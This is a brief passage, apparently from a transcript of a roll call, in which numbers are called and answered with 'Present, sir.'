3,
Present, sir.
4,
Present, sir.
5, 25. Okay, thank you.